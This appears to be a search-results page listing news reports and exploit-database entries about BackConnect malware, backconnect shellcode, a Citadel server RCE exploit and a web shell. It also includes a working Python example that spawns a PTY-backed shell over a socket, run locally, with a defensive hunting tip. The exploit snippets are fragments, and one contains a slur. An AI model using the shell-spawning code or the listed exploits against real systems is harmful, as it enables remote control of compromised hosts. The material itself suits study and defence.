17 matches found
Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates
Threat actors deploying the Black Basta and CACTUS ransomware families have been found to rely on the same BackConnect (BC) module for maintaining persistent control over infected hosts, a sign that affiliates previously associated with Black Basta may have transitioned to CACTUS. "Once infiltrated...
Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal
In this blog entry, we discuss how the Black Basta and Cactus ransomware groups utilized the BackConnect malware to maintain persistent control and exfiltrate sensitive data from compromised machines...
QakBot-Linked BC Malware Adds Enhanced Remote Access and Data Gathering Features
Cybersecurity researchers have disclosed details of a new BackConnect (BC) malware that has been developed by threat actors linked to the infamous QakBot loader. "BackConnect is a common feature or module utilized by threat actors to maintain persistence and perform tasks," Walmart's Cyber...
QakBot Malware Operators Expand C2 Network with 15 New Servers
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed tha...
IcedID Malware Adapts and Expands Threat with Updated BackConnect Module
The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot, is a strain of malware similar to Emotet and QakBot that start...
Owner of DDoS mitigation firm launched DDoS attacks on others
By Waqas The owner of cybersecurity firm BackConnect turned from cyber defender to cyber criminal...
DDoS Mitigation Firm Founder Admits to DDoS
A Georgia man who co-founded a service designed to protect companies from crippling distributed denial-of-service (DDoS) attacks has pleaded guilty to paying a DDoS-for-hire service to launch attacks against others. Tucker Preston, 22, of Macon, Ga., pleaded guilty last week in a New Jersey court to one...
PostShell - Post Exploitation Bind/Backconnect Shell
PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix-like system. Why not use a traditional Backconnect/Bind Shell? PostShell allows...
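The PostShell entry above turns on one design point: a traditional backconnect or bind shell simply dup2()s the socket over the shell's stdin, stdout and stderr, so the spawned shell has no controlling terminal and therefore no job control, whereas PostShell allocates a full TTY. The Python program below is an added example written for this page, not PostShell's own code; it shows both variants side by side and checks what the spawned shell actually sees. It assumes /bin/sh is present and uses a UNIX socketpair (constructed here) as a stand-in for the TCP backconnect socket.

```python
"""Plain dup2 reverse shell versus a PTY-backed backconnect shell.

Added example for this page (not PostShell's code). A UNIX socketpair is a
constructed stand-in for the TCP backconnect socket; /bin/sh is assumed.
"""
import fcntl
import os
import select
import signal
import socket
import termios


def _exit_code(status):
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1


def spawn_plain(sock_fd, cmd):
    """Classic reverse shell: stdio is the socket itself, so there is no tty."""
    pid = os.fork()
    if pid == 0:
        try:
            for fd in (0, 1, 2):
                os.dup2(sock_fd, fd)
            os.execv("/bin/sh", ["sh", "-c", cmd])
        finally:
            os._exit(127)                      # only reached if exec failed
    _, status = os.waitpid(pid, 0)
    return _exit_code(status)


def _relay(master, sock_fd, pid):
    """Pump bytes between the pty master and the socket until the shell exits."""
    status = None
    while status is None:
        wpid, st = os.waitpid(pid, os.WNOHANG)
        if wpid == pid:
            status = st                        # shell gone: one last pass drains the master
        readable, _, _ = select.select([master, sock_fd], [], [], 0.02)
        if master in readable:
            try:
                data = os.read(master, 4096)
            except OSError:                    # EIO on Linux once the slave side is closed
                data = b""
            if data:
                os.write(sock_fd, data)        # shell output -> operator
        if sock_fd in readable:
            data = os.read(sock_fd, 4096)
            if data:
                os.write(master, data)         # operator keystrokes -> shell
            elif status is None:               # operator hung up: hang up the shell too
                os.kill(pid, signal.SIGHUP)
                _, status = os.waitpid(pid, 0)
    return status


def spawn_pty(sock_fd, cmd):
    """Backconnect shell behind a pseudo-terminal: isatty() true, job control on."""
    master, slave = os.openpty()
    pid = os.fork()
    if pid == 0:
        try:
            os.close(master)
            os.setsid()                                # new session, no controlling tty yet
            fcntl.ioctl(slave, termios.TIOCSCTTY, 0)   # make the pty slave our controlling tty
            for fd in (0, 1, 2):
                os.dup2(slave, fd)
            if slave > 2:
                os.close(slave)
            os.execv("/bin/sh", ["sh", "-c", cmd])
        finally:
            os._exit(127)
    os.close(slave)                                    # parent keeps only the master side
    status = _relay(master, sock_fd, pid)
    os.close(master)
    return _exit_code(status)


def shell_sees_tty(use_pty):
    """Run `test -t 0` (exit 0 iff stdin is a terminal) through one of the variants."""
    a, b = socket.socketpair()                         # constructed stand-in for the TCP socket
    try:
        run = spawn_pty if use_pty else spawn_plain
        return run(b.fileno(), "test -t 0") == 0
    finally:
        a.close()
        b.close()


if __name__ == "__main__":
    print("plain dup2 shell sees a tty:", shell_sees_tty(False))  # False
    print("pty-backed shell sees a tty:", shell_sees_tty(True))   # True
```

Run it directly to see the two results: the plain variant answers False because the shell's stdin is a socket, the PTY variant True because the child made the pty slave its controlling terminal with setsid() and TIOCSCTTY before exec. The same relay loop is what carries operator keystrokes to the shell and its output back to the socket in a real backconnect; on the defensive side, a /bin/sh whose parent holds a pty master and a network socket but has no sshd or terminal emulator in its ancestry is the process-tree shape to hunt for.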
Malware exploit: Citadel
Type: Remote Code Execution Author: Xylitol import urllib import urllib2 # Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability # Works only on a Windows box def request(url, params=None, method='GET'): if method == 'POST': urllib2.urlopen(url, urllib.urlencode(params)).read() elif method ==...
MoinMoin - Arbitrary Command Execution
No description provided by source. #!/usr/bin/env python # -*- coding: utf-8 -*- ascii = '\x1b[1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██...
Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
start "backgroundexec" cbcs.exe listen -cp:faggot -bp:hacker | echo "" shell.php Usage Info Edit the code and run ! import urllib import urllib2 # Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability # Works only on a Windows box def request(url, params=None, method='GET'): if method ==...
win32/xp sp2 ARABIC (ar) backconnect + acceptconnection 376 bytes
-------- Title : windows xp sp2 ARABIC backconnect + acceptconnection shellcode = 376 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria | Web Site : www.1337day.com platform : windows xp arabic sp2 | Type : local root / exploit / shellcode / etc download...
linux/x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes
Title : Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria Web Site : www.1337day.com platform : backboX 32 bit Eng Type : local root / exploit / shellcode / etc download link : backbox.org...
PPS 4.0 perl-cgi web shell
PPS 4.0 perl-cgi web shell This utility is intended for system administrators to manage their own server remotely. Any unlawful use of the script is prosecuted by law. SIZE: 55.88 KB last update - 12.07.2013 09:45 Cookie-based authorization SystemInfo - server information Fi...